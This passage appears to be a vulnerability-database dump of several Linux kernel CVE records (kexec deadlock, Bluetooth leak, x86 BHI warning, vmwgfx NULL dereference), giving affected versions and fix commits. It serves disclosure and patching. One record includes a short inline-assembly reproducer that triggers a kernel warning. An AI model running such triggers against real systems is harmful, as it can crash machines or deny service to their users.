              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.82",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.0.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: kexec: Avoid deadlock in kexec crash path\n\nIf the kexec crash code is called in the interrupt context, the\nmachine_kexec_mask_interrupts() function will trigger a deadlock while\ntrying to acquire the irqdesc spinlock and then deactivate irqchip in\nirq_set_irqchip_state() function.\n\nUnlike arm64, riscv only requires irq_eoi handler to complete EOI and\nkeeping irq_set_irqchip_state() will only leave this possible deadlock\nwithout any use. So we simply remove it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:44.900Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/bb80a7911218bbab2a69b5db7d2545643ab0073d"
        },
        {
          "url": "https://git.kernel.org/stable/c/653deee48a4682ea17a05b96fb6842795ab5943c"
        },
        {
          "url": "https://git.kernel.org/stable/c/7692c9b6baacdee378435f58f19baf0eb69e4155"
        },
        {
          "url": "https://git.kernel.org/stable/c/484dd545271d02d1571e1c6b62ea7df9dbe5e692"
        },
        {
          "url": "https://git.kernel.org/stable/c/c562ba719df570c986caf0941fea2449150bcbc4"
        }
      ],
      "title": "riscv: kexec: Avoid deadlock in kexec crash path",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42140",
    "datePublished": "2024-07-30T07:46:34.260Z",
    "dateReserved": "2024-07-29T15:50:41.189Z",
    "dateUpdated": "2025-11-03T22:02:08.287Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35978 (GCVE-0-2024-35978)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:42 – Updated: 2025-05-04 09:09

Title

Bluetooth: Fix memory leak in hci_req_sync_complete()

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Fix memory leak in hci_req_sync_complete() In 'hci_req_sync_complete()', always free the previous sync request state before assigning reference to a new one.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/89a32741f42178560…
	https://git.kernel.org/stable/c/4beab84fbb50df3be…
	https://git.kernel.org/stable/c/8478394f76c748862…
	https://git.kernel.org/stable/c/75193678cce993aa9…
	https://git.kernel.org/stable/c/66fab1e120b39f8f4…
	https://git.kernel.org/stable/c/9ab5e44b9bac946bd…
	https://git.kernel.org/stable/c/e4cb8382fff670643…
	https://git.kernel.org/stable/c/45d355a926ab40f3a…

Impacted products

Vendor

Product

Version

Linux

Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 89a32741f4217856066c198a4a7267bcdd1edd67 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 4beab84fbb50df3be1d8f8a976e6fe882ca65cb2 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 8478394f76c748862ef179a16f651f752bdafaf0 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 75193678cce993aa959e7764b6df2f599886dd06 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 66fab1e120b39f8f47a94186ddee36006fc02ca8 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 9ab5e44b9bac946bd49fd63264a08cd1ea494e76 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < e4cb8382fff6706436b66eafd9c0ee857ff0a9f5 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810 (git)

Linux

Affected: 4.1
Unaffected: 0 , < 4.1 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.156 , ≤ 5.15.* (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.106Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/89a32741f4217856066c198a4a7267bcdd1edd67"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4beab84fbb50df3be1d8f8a976e6fe882ca65cb2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8478394f76c748862ef179a16f651f752bdafaf0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/75193678cce993aa959e7764b6df2f599886dd06"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/66fab1e120b39f8f47a94186ddee36006fc02ca8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9ab5e44b9bac946bd49fd63264a08cd1ea494e76"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e4cb8382fff6706436b66eafd9c0ee857ff0a9f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35978",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:40:19.764232Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:13.184Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_request.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "89a32741f4217856066c198a4a7267bcdd1edd67",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "4beab84fbb50df3be1d8f8a976e6fe882ca65cb2",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "8478394f76c748862ef179a16f651f752bdafaf0",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "75193678cce993aa959e7764b6df2f599886dd06",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "66fab1e120b39f8f47a94186ddee36006fc02ca8",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "9ab5e44b9bac946bd49fd63264a08cd1ea494e76",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "e4cb8382fff6706436b66eafd9c0ee857ff0a9f5",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_request.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.1"
            },
            {
              "lessThan": "4.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.156",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.156",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: Fix memory leak in hci_req_sync_complete()\n\nIn \u0027hci_req_sync_complete()\u0027, always free the previous sync\nrequest state before assigning reference to a new one."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:43.997Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/89a32741f4217856066c198a4a7267bcdd1edd67"
        },
        {
          "url": "https://git.kernel.org/stable/c/4beab84fbb50df3be1d8f8a976e6fe882ca65cb2"
        },
        {
          "url": "https://git.kernel.org/stable/c/8478394f76c748862ef179a16f651f752bdafaf0"
        },
        {
          "url": "https://git.kernel.org/stable/c/75193678cce993aa959e7764b6df2f599886dd06"
        },
        {
          "url": "https://git.kernel.org/stable/c/66fab1e120b39f8f47a94186ddee36006fc02ca8"
        },
        {
          "url": "https://git.kernel.org/stable/c/9ab5e44b9bac946bd49fd63264a08cd1ea494e76"
        },
        {
          "url": "https://git.kernel.org/stable/c/e4cb8382fff6706436b66eafd9c0ee857ff0a9f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810"
        }
      ],
      "title": "Bluetooth: Fix memory leak in hci_req_sync_complete()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35978",
    "datePublished": "2024-05-20T09:42:03.759Z",
    "dateReserved": "2024-05-17T13:50:33.144Z",
    "dateUpdated": "2025-05-04T09:09:43.997Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42240 (GCVE-0-2024-42240)

Vulnerability from cvelistv5 – Published: 2024-08-07 15:14 – Updated: 2025-11-03 22:02

Title

x86/bhi: Avoid warning in #DB handler due to BHI mitigation

Summary

In the Linux kernel, the following vulnerability has been resolved: x86/bhi: Avoid warning in #DB handler due to BHI mitigation When BHI mitigation is enabled, if SYSENTER is invoked with the TF flag set then entry_SYSENTER_compat() uses CLEAR_BRANCH_HISTORY and calls the clear_bhb_loop() before the TF flag is cleared. This causes the #DB handler (exc_debug_kernel()) to issue a warning because single-step is used outside the entry_SYSENTER_compat() function. To address this issue, entry_SYSENTER_compat() should use CLEAR_BRANCH_HISTORY after making sure the TF flag is cleared. The problem can be reproduced with the following sequence: $ cat sysenter_step.c int main() { asm("pushf; pop %ax; bts $8,%ax; push %ax; popf; sysenter"); } $ gcc -o sysenter_step sysenter_step.c $ ./sysenter_step Segmentation fault (core dumped) The program is expected to crash, and the #DB handler will issue a warning. Kernel log: WARNING: CPU: 27 PID: 7000 at arch/x86/kernel/traps.c:1009 exc_debug_kernel+0xd2/0x160 ... RIP: 0010:exc_debug_kernel+0xd2/0x160 ... Call Trace: <#DB> ? show_regs+0x68/0x80 ? __warn+0x8c/0x140 ? exc_debug_kernel+0xd2/0x160 ? report_bug+0x175/0x1a0 ? handle_bug+0x44/0x90 ? exc_invalid_op+0x1c/0x70 ? asm_exc_invalid_op+0x1f/0x30 ? exc_debug_kernel+0xd2/0x160 exc_debug+0x43/0x50 asm_exc_debug+0x1e/0x40 RIP: 0010:clear_bhb_loop+0x0/0xb0 ... </#DB> <TASK> ? entry_SYSENTER_compat_after_hwframe+0x6e/0x8d </TASK> [ bp: Massage commit message. ]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/db56615e96c439e13…
	https://git.kernel.org/stable/c/a765679defe1dc1b8…
	https://git.kernel.org/stable/c/dae3543db8f0cf8ac…
	https://git.kernel.org/stable/c/08518d48e5b744620…
	https://git.kernel.org/stable/c/ac8b270b61d48fcc6…

Impacted products

Vendor

Product

Version

Linux

Affected: bd53ec80f21839cfd4d852a6088279d602d67e5b , < db56615e96c439e13783d7715330e824b4fd4b84 (git)
Affected: 07dbb10f153f483e8249acebdffedf922e2ec2e1 , < a765679defe1dc1b8fa01928a6ad6361e72a1364 (git)
Affected: eb36b0dce2138581bc6b5e39d0273cb4c96ded81 , < dae3543db8f0cf8ac1a198c3bb4b6e3c24d576cf (git)
Affected: 7390db8aea0d64e9deb28b8e1ce716f5020c7ee5 , < 08518d48e5b744620524f0acd7c26c19bda7f513 (git)
Affected: 7390db8aea0d64e9deb28b8e1ce716f5020c7ee5 , < ac8b270b61d48fcc61f052097777e3b5e11591e0 (git)
Affected: 8f51637712e4da5be410a1666f8aee0d86eef898 (git)

Linux

Affected: 6.9
Unaffected: 0 , < 6.9 (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42240",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:13:51.001454Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:31.693Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:42.210Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/entry/entry_64_compat.S"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "db56615e96c439e13783d7715330e824b4fd4b84",
              "status": "affected",
              "version": "bd53ec80f21839cfd4d852a6088279d602d67e5b",
              "versionType": "git"
            },
            {
              "lessThan": "a765679defe1dc1b8fa01928a6ad6361e72a1364",
              "status": "affected",
              "version": "07dbb10f153f483e8249acebdffedf922e2ec2e1",
              "versionType": "git"
            },
            {
              "lessThan": "dae3543db8f0cf8ac1a198c3bb4b6e3c24d576cf",
              "status": "affected",
              "version": "eb36b0dce2138581bc6b5e39d0273cb4c96ded81",
              "versionType": "git"
            },
            {
              "lessThan": "08518d48e5b744620524f0acd7c26c19bda7f513",
              "status": "affected",
              "version": "7390db8aea0d64e9deb28b8e1ce716f5020c7ee5",
              "versionType": "git"
            },
            {
              "lessThan": "ac8b270b61d48fcc61f052097777e3b5e11591e0",
              "status": "affected",
              "version": "7390db8aea0d64e9deb28b8e1ce716f5020c7ee5",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "8f51637712e4da5be410a1666f8aee0d86eef898",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/entry/entry_64_compat.S"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.9"
            },
            {
              "lessThan": "6.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.154",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "6.1.85",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "6.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.8.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/bhi: Avoid warning in #DB handler due to BHI mitigation\n\nWhen BHI mitigation is enabled, if SYSENTER is invoked with the TF flag set\nthen entry_SYSENTER_compat() uses CLEAR_BRANCH_HISTORY and calls the\nclear_bhb_loop() before the TF flag is cleared. This causes the #DB handler\n(exc_debug_kernel()) to issue a warning because single-step is used outside the\nentry_SYSENTER_compat() function.\n\nTo address this issue, entry_SYSENTER_compat() should use CLEAR_BRANCH_HISTORY\nafter making sure the TF flag is cleared.\n\nThe problem can be reproduced with the following sequence:\n\n  $ cat sysenter_step.c\n  int main()\n  { asm(\"pushf; pop %ax; bts $8,%ax; push %ax; popf; sysenter\"); }\n\n  $ gcc -o sysenter_step sysenter_step.c\n\n  $ ./sysenter_step\n  Segmentation fault (core dumped)\n\nThe program is expected to crash, and the #DB handler will issue a warning.\n\nKernel log:\n\n  WARNING: CPU: 27 PID: 7000 at arch/x86/kernel/traps.c:1009 exc_debug_kernel+0xd2/0x160\n  ...\n  RIP: 0010:exc_debug_kernel+0xd2/0x160\n  ...\n  Call Trace:\n  \u003c#DB\u003e\n   ? show_regs+0x68/0x80\n   ? __warn+0x8c/0x140\n   ? exc_debug_kernel+0xd2/0x160\n   ? report_bug+0x175/0x1a0\n   ? handle_bug+0x44/0x90\n   ? exc_invalid_op+0x1c/0x70\n   ? asm_exc_invalid_op+0x1f/0x30\n   ? exc_debug_kernel+0xd2/0x160\n   exc_debug+0x43/0x50\n   asm_exc_debug+0x1e/0x40\n  RIP: 0010:clear_bhb_loop+0x0/0xb0\n  ...\n  \u003c/#DB\u003e\n  \u003cTASK\u003e\n   ? entry_SYSENTER_compat_after_hwframe+0x6e/0x8d\n  \u003c/TASK\u003e\n\n  [ bp: Massage commit message. ]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:48.564Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/db56615e96c439e13783d7715330e824b4fd4b84"
        },
        {
          "url": "https://git.kernel.org/stable/c/a765679defe1dc1b8fa01928a6ad6361e72a1364"
        },
        {
          "url": "https://git.kernel.org/stable/c/dae3543db8f0cf8ac1a198c3bb4b6e3c24d576cf"
        },
        {
          "url": "https://git.kernel.org/stable/c/08518d48e5b744620524f0acd7c26c19bda7f513"
        },
        {
          "url": "https://git.kernel.org/stable/c/ac8b270b61d48fcc61f052097777e3b5e11591e0"
        }
      ],
      "title": "x86/bhi: Avoid warning in #DB handler due to BHI mitigation",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42240",
    "datePublished": "2024-08-07T15:14:27.977Z",
    "dateReserved": "2024-07-30T07:40:12.253Z",
    "dateUpdated": "2025-11-03T22:02:42.210Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-38096 (GCVE-0-2022-38096)

Vulnerability from cvelistv5 – Published: 2022-09-09 14:39 – Updated: 2024-09-16 19:46

Title

There is a NULL pointer vulnerability in vmwgfx driver

Summary

A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).

Severity ?

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Anolis

References

URL

Tags

	https://bugzilla.openanolis.cn/show_bug.cgi?id=2073
	https://lists.debian.org/debian-lts-announce/2024…	mailing-list

Impacted products

	Vendor	Product	Version
	Linux	kernel	Affected: v4.20-rc1 , < 5.13.0-52* (custom)

Credits

Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.14",
                "status": "affected",
                "version": "v4.20-rc1",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-38096",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-26T13:45:25.191519Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-26T13:49:29.690Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:45:52.802Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
          },
          {
            "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
